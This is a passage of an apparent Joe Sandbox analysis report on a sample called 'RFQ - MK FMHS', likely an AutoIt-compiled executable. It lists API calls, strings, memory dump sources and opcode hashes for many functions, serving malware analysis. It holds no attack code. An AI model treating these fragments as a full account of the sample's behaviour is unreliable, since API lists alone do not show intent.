                    • GetStockObject.GDI32(00000011), ref: 00E729CA
                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E729D5
                      • Part of subcall function 00E72344: GetCursorPos.USER32(?), ref: 00E72357
                      • Part of subcall function 00E72344: ScreenToClient.USER32(00F367B0,?), ref: 00E72374
                      • Part of subcall function 00E72344: GetAsyncKeyState.USER32(00000001), ref: 00E72399
                      • Part of subcall function 00E72344: GetAsyncKeyState.USER32(00000002), ref: 00E723A7
                    • SetTimer.USER32(00000000,00000000,00000028,00E71256), ref: 00E729FC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                    • String ID: AutoIt v3 GUI
                    • API String ID: 1458621304-248962490
                    • Opcode ID: 03c088a7d77ec4bc8e18595130ca2e3249d4a0410def54d7b05610dc376e9500
                    • Instruction ID: 82fe4ee1aae3f970e5d8a38019094f3db95f63f353acedb7fdc44cffdb1321b6
                    • Opcode Fuzzy Hash: 03c088a7d77ec4bc8e18595130ca2e3249d4a0410def54d7b05610dc376e9500
                    • Instruction Fuzzy Hash: A1B16C71A0020AAFDB14DFA8DC45BAE7BB5FF48315F109129FA19FA290DB70A845DB50
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 00EF40F6
                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00EF41B6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: BuffCharMessageSendUpper
                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                    • API String ID: 3974292440-719923060
                    • Opcode ID: 7f298dde55d50aee78a829e11612ddb58b5a8718bf1daa25809b1671c137ae8c
                    • Instruction ID: a5ce7e4331400c08f8f110a435a68124e3dbf38f5f22c5869780f9c1bdccfe34
                    • Opcode Fuzzy Hash: 7f298dde55d50aee78a829e11612ddb58b5a8718bf1daa25809b1671c137ae8c
                    • Instruction Fuzzy Hash: 70A17B702142199FCB14EF24C951A7AB3E5AF84314F14A96DB99ABB3D3DB30ED06CB41
                    APIs
                    • LoadCursorW.USER32(00000000,00007F89), ref: 00EE5309
                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00EE5314
                    • LoadCursorW.USER32(00000000,00007F00), ref: 00EE531F
                    • LoadCursorW.USER32(00000000,00007F03), ref: 00EE532A
                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00EE5335
                    • LoadCursorW.USER32(00000000,00007F01), ref: 00EE5340
                    • LoadCursorW.USER32(00000000,00007F81), ref: 00EE534B
                    • LoadCursorW.USER32(00000000,00007F88), ref: 00EE5356
                    • LoadCursorW.USER32(00000000,00007F80), ref: 00EE5361
                    • LoadCursorW.USER32(00000000,00007F86), ref: 00EE536C
                    • LoadCursorW.USER32(00000000,00007F83), ref: 00EE5377
                    • LoadCursorW.USER32(00000000,00007F85), ref: 00EE5382
                    • LoadCursorW.USER32(00000000,00007F82), ref: 00EE538D
                    • LoadCursorW.USER32(00000000,00007F84), ref: 00EE5398
                    • LoadCursorW.USER32(00000000,00007F04), ref: 00EE53A3
                    • LoadCursorW.USER32(00000000,00007F02), ref: 00EE53AE
                    • GetCursorInfo.USER32(?), ref: 00EE53BE
                    • GetLastError.KERNEL32(00000001,00000000), ref: 00EE53E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Cursor$Load$ErrorInfoLast
                    • String ID:
                    • API String ID: 3215588206-0
                    • Opcode ID: efc16af5d3db369b1bf9cca5056f67eafdb35b655f38c2621dd201fc49044775
                    • Instruction ID: 400fe3bd36d7739c28be7c585744d6d372f0bcd29b4577273a9b062102e9f8f9
                    • Opcode Fuzzy Hash: efc16af5d3db369b1bf9cca5056f67eafdb35b655f38c2621dd201fc49044775
                    • Instruction Fuzzy Hash: BE416071E043196ADB109FBA8C49D6EFEF8EF91B10F10452FE519E7291DAB8A401CE61
                    APIs
                    • GetClassNameW.USER32(?,?,00000100), ref: 00ECAAA5
                    • __swprintf.LIBCMT ref: 00ECAB46
                    • _wcscmp.LIBCMT ref: 00ECAB59
                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00ECABAE
                    • _wcscmp.LIBCMT ref: 00ECABEA
                    • GetClassNameW.USER32(?,?,00000400), ref: 00ECAC21
                    • GetDlgCtrlID.USER32(?), ref: 00ECAC73
                    • GetWindowRect.USER32(?,?), ref: 00ECACA9
                    • GetParent.USER32(?), ref: 00ECACC7
                    • ScreenToClient.USER32(00000000), ref: 00ECACCE
                    • GetClassNameW.USER32(?,?,00000100), ref: 00ECAD48
                    • _wcscmp.LIBCMT ref: 00ECAD5C
                    • GetWindowTextW.USER32(?,?,00000400), ref: 00ECAD82
                    • _wcscmp.LIBCMT ref: 00ECAD96
                      • Part of subcall function 00E9386C: _iswctype.LIBCMT ref: 00E93874
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                    • String ID: %s%u
                    • API String ID: 3744389584-679674701
                    • Opcode ID: f2f9bcea87f6b709b46bee472c394b37a0db9b3b8d17c3a83527c297fbfbc8ab
                    • Instruction ID: 528855467fb0f243759e6b51a12d2e6cc73c109ec021fda1b3d5c3cee3f70204
                    • Opcode Fuzzy Hash: f2f9bcea87f6b709b46bee472c394b37a0db9b3b8d17c3a83527c297fbfbc8ab
                    • Instruction Fuzzy Hash: ADA1B07120420AAFD714DE20C984FEAFBE8FF4431DF04552DF99AE2190DB31A946CB92
                    APIs
                    • GetClassNameW.USER32(00000008,?,00000400), ref: 00ECB3DB
                    • _wcscmp.LIBCMT ref: 00ECB3EC
                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 00ECB414
                    • CharUpperBuffW.USER32(?,00000000), ref: 00ECB431
                    • _wcscmp.LIBCMT ref: 00ECB44F
                    • _wcsstr.LIBCMT ref: 00ECB460
                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00ECB498
                    • _wcscmp.LIBCMT ref: 00ECB4A8
                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 00ECB4CF
                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00ECB518
                    • _wcscmp.LIBCMT ref: 00ECB528
                    • GetClassNameW.USER32(00000010,?,00000400), ref: 00ECB550
                    • GetWindowRect.USER32(00000004,?), ref: 00ECB5B9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                    • String ID: @$ThumbnailClass
                    • API String ID: 1788623398-1539354611
                    • Opcode ID: f458421cd2b0c7cf0f5b885b911b059fe3c9bffa9e45a86689c0ec83fc7431ab
                    • Instruction ID: 7d6b44e0e0238f02c9fe563d80644321cb9651267ed67690a6af42d38f63089b
                    • Opcode Fuzzy Hash: f458421cd2b0c7cf0f5b885b911b059fe3c9bffa9e45a86689c0ec83fc7431ab
                    • Instruction Fuzzy Hash: 6C8180710083059FDB14DF14CA86FAA77E8EF44318F04A56DFD89AA092EB35DD4ACB61
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                    • API String ID: 1038674560-1810252412
                    • Opcode ID: 4029e9f1d0590c9a3a21aa40d4a3686582ec1da9e4893868e27b095be8ad10e0
                    • Instruction ID: ccc5474f2528179d4bae3ac2807d2855e31ef4e2d03017753259e918e2d5b5e6
                    • Opcode Fuzzy Hash: 4029e9f1d0590c9a3a21aa40d4a3686582ec1da9e4893868e27b095be8ad10e0
                    • Instruction Fuzzy Hash: AF31C831948315A6DF18FA60DE43FEE77E89F10750F60502DF845720E1EF92AE05D552
                    APIs
                    • LoadIconW.USER32(00000063), ref: 00ECC4D4
                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00ECC4E6
                    • SetWindowTextW.USER32(?,?), ref: 00ECC4FD
                    • GetDlgItem.USER32(?,000003EA), ref: 00ECC512
                    • SetWindowTextW.USER32(00000000,?), ref: 00ECC518
                    • GetDlgItem.USER32(?,000003E9), ref: 00ECC528
                    • SetWindowTextW.USER32(00000000,?), ref: 00ECC52E
                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00ECC54F
                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00ECC569
                    • GetWindowRect.USER32(?,?), ref: 00ECC572
                    • SetWindowTextW.USER32(?,?), ref: 00ECC5DD
                    • GetDesktopWindow.USER32 ref: 00ECC5E3
                    • GetWindowRect.USER32(00000000), ref: 00ECC5EA
                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00ECC636
                    • GetClientRect.USER32(?,?), ref: 00ECC643
                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00ECC668
                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00ECC693
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                    • String ID:
                    • API String ID: 3869813825-0
                    • Opcode ID: 8cc92b1d9952fa52aca60a31d0deefc370a14e70d20925973a52325a3c7eb3f4
                    • Instruction ID: b237d1741d5af3ffbe4ac025e6893422987c36dccd1a61db6b269148fd45acfd
                    • Opcode Fuzzy Hash: 8cc92b1d9952fa52aca60a31d0deefc370a14e70d20925973a52325a3c7eb3f4
                    • Instruction Fuzzy Hash: B4517C70900709AFDB209FA9CE85F6EBBF5FF44708F10492CE686B25A0CB75A945CB40
                    APIs
                    • _memset.LIBCMT ref: 00EFA4C8
                    • DestroyWindow.USER32(?,?), ref: 00EFA542
                      • Part of subcall function 00E77D2C: _memmove.LIBCMT ref: 00E77D66
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00EFA5BC
                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00EFA5DE
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EFA5F1
                    • DestroyWindow.USER32(00000000), ref: 00EFA613
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00E70000,00000000), ref: 00EFA64A
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EFA663
                    • GetDesktopWindow.USER32 ref: 00EFA67C
                    • GetWindowRect.USER32(00000000), ref: 00EFA683
                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00EFA69B
                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00EFA6B3
                      • Part of subcall function 00E725DB: GetWindowLongW.USER32(?,000000EB), ref: 00E725EC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                    • String ID: 0$tooltips_class32
                    • API String ID: 1297703922-3619404913
                    • Opcode ID: 7fca8ac0170e8c5584eaaff12b0af90d26ba191b84216e69257fe45c47b63bc9
                    • Instruction ID: 0ae913a5509fe34183f82f91d4888fbed1772d3d65c0f93d75b26d48bb8d1e07
                    • Opcode Fuzzy Hash: 7fca8ac0170e8c5584eaaff12b0af90d26ba191b84216e69257fe45c47b63bc9
                    • Instruction Fuzzy Hash: 18716BB1140209AFD720CF28C845F767BE6EF88304F09452DFA89EB2A1DB70E905DB56
                    APIs
                      • Part of subcall function 00E72612: GetWindowLongW.USER32(?,000000EB), ref: 00E72623
                    • DragQueryPoint.SHELL32(?,?), ref: 00EFC917
                      • Part of subcall function 00EFADF1: ClientToScreen.USER32(?,?), ref: 00EFAE1A
                      • Part of subcall function 00EFADF1: GetWindowRect.USER32(?,?), ref: 00EFAE90
                      • Part of subcall function 00EFADF1: PtInRect.USER32(?,?,00EFC304), ref: 00EFAEA0
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00EFC980
                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00EFC98B
                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00EFC9AE
                    • _wcscat.LIBCMT ref: 00EFC9DE
                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00EFC9F5
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00EFCA0E
                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00EFCA25
                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00EFCA47
                    • DragFinish.SHELL32(?), ref: 00EFCA4E
                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00EFCB41
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                    • API String ID: 169749273-3440237614
                    • Opcode ID: 128bdf6d343e89b9acf6c46cc973adf0b92b73a984f01b78cf614957ab6654e1
                    • Instruction ID: 137ad8aec1931496ff0bae534e077eea30b3c7a5aa02d4b18a17b1bfe5f1c222
                    • Opcode Fuzzy Hash: 128bdf6d343e89b9acf6c46cc973adf0b92b73a984f01b78cf614957ab6654e1
                    • Instruction Fuzzy Hash: D7617A71108304AFC711EF60DC85DAFBBE8EFC8710F10492EF695A61A1DB709A49CB92
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 00EF46AB
                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00EF46F6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: BuffCharMessageSendUpper
                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                    • API String ID: 3974292440-4258414348
                    • Opcode ID: 2607bb71d6c80fe4ce4232bc002547542b6f10a625e285194430ace6c0eb1442
                    • Instruction ID: d8c7500b85dc4d00ed289c39d4aee52f61d180cb774cafb87f14dc696f029277
                    • Opcode Fuzzy Hash: 2607bb71d6c80fe4ce4232bc002547542b6f10a625e285194430ace6c0eb1442
                    • Instruction Fuzzy Hash: 6D9169742043059FCB14EF20C451A6AB7E1AF84314F05A86DF99A7B3A3DB31ED4ACB81
                    APIs
                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00EFBB6E
                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00EF6D80,?), ref: 00EFBBCA
                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EFBC03
                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00EFBC46
                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EFBC7D
                    • FreeLibrary.KERNEL32(?), ref: 00EFBC89
                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00EFBC99
                    • DestroyIcon.USER32(?), ref: 00EFBCA8
                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00EFBCC5
                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00EFBCD1
                      • Part of subcall function 00E9313D: __wcsicmp_l.LIBCMT ref: 00E931C6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                    • String ID: .dll$.exe$.icl
                    • API String ID: 1212759294-1154884017
                    • Opcode ID: 82c7ce416a7d0a19d2f2acfbdec8b4d5f49be5c7f2c04ae64e756f2419410651
                    • Instruction ID: 08ae7f39b066d29435036b02151185ab5f3ae16d2b287dc185b897f9bf469184
                    • Opcode Fuzzy Hash: 82c7ce416a7d0a19d2f2acfbdec8b4d5f49be5c7f2c04ae64e756f2419410651
                    • Instruction Fuzzy Hash: 0A61CF71500219BEEF14DF65CC85FBABBA8EF08710F10911AFE15E61D1DB74AA94CBA0
                    APIs
                      • Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
                      • Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C
                    • CharLowerBuffW.USER32(?,?), ref: 00EDA636
                    • GetDriveTypeW.KERNEL32 ref: 00EDA683
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EDA6CB
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EDA702
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EDA730
                      • Part of subcall function 00E77D2C: _memmove.LIBCMT ref: 00E77D66
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                    • API String ID: 2698844021-4113822522
                    • Opcode ID: e45210eca7affb57c68abcf6393382d195b8c0a042c74b067cb28af854c8eb6e
                    • Instruction ID: 1b80546c7905b8d68cdd23b6605886b6fa0f0e03c284c57139d2eb2845f5a65a
                    • Opcode Fuzzy Hash: e45210eca7affb57c68abcf6393382d195b8c0a042c74b067cb28af854c8eb6e
                    • Instruction Fuzzy Hash: B7515E711043059FC700EF24D98196AB7F4FF98718F14996DF89A672A2DB31EE0ACB52
                    APIs
                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00EDA47A
                    • __swprintf.LIBCMT ref: 00EDA49C
                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00EDA4D9
                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00EDA4FE
                    • _memset.LIBCMT ref: 00EDA51D
                    • _wcsncpy.LIBCMT ref: 00EDA559
                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00EDA58E
                    • CloseHandle.KERNEL32(00000000), ref: 00EDA599
                    • RemoveDirectoryW.KERNEL32(?), ref: 00EDA5A2
                    • CloseHandle.KERNEL32(00000000), ref: 00EDA5AC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                    • String ID: :$\$\??\%s
                    • API String ID: 2733774712-3457252023
                    • Opcode ID: b7713f8d4214d3dc3eb9c10949d8220190f269b8133bf180e4da28d8b5d460f9
                    • Instruction ID: 165c6989963925740e325f786886101cd26733c84bae6de45de172a7f9601241
                    • Opcode Fuzzy Hash: b7713f8d4214d3dc3eb9c10949d8220190f269b8133bf180e4da28d8b5d460f9
                    • Instruction Fuzzy Hash: 9E31AEB650020AABDB219FA1DC48FFB33BCEF88705F1451B6F908E6160E77097458B25
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                    • String ID:
                    • API String ID: 884005220-0
                    • Opcode ID: 06db960ddd2f1b65b2e0f9d8a477ec5f15c76b58c1ac70e5ac11280978034adc
